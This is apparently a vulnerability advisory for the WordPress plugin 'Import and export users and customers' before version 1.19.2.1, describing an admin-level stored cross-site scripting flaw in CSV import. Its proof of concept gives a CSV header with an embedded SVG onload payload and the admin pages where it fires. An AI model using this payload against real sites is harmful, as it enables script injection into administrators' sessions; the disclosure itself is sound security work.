WordPress Plugin Vulnerabilities
Import and export users and customers < 1.19.2.1 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not sanitise and escaped imported CSV data, which could allow high privilege users to import malicious javascript code and lead to Stored Cross-Site Scripting issues
Proof of Concept
As admin, import the below CSV file via Tools > Import and export users and customers (/wp-admin/tools.php?page=acui) user_login user_email display_name role<svg onload=confirm(/XSS/)// first_name last_name billing_first_name billing_last_name billing_company billing_email billing_phone billing_country billing_address_1 billing_address_2 billing_city billing_state billing_postcode shipping_first_name shipping_last_name shipping_company shipping_country shipping_address_1 shipping_address_2 shipping_city shipping_state shipping_postcode Then the XSS will be triggered after the import, as well as in the Extra profile fields page of the plugin (/wp-admin/tools.php?page=acui&tab=columns)
Affects Plugins
Fixed in version 1.19.2.1
References
Classification
Miscellaneous
Original Researcher
0x23.so
Submitter
0x23.so
Verified
Yes
Timeline
Publicly Published
2022-04-11 (about 2 months ago)
Added
2022-04-11 (about 2 months ago)
Last Updated
2022-04-13 (about 2 months ago)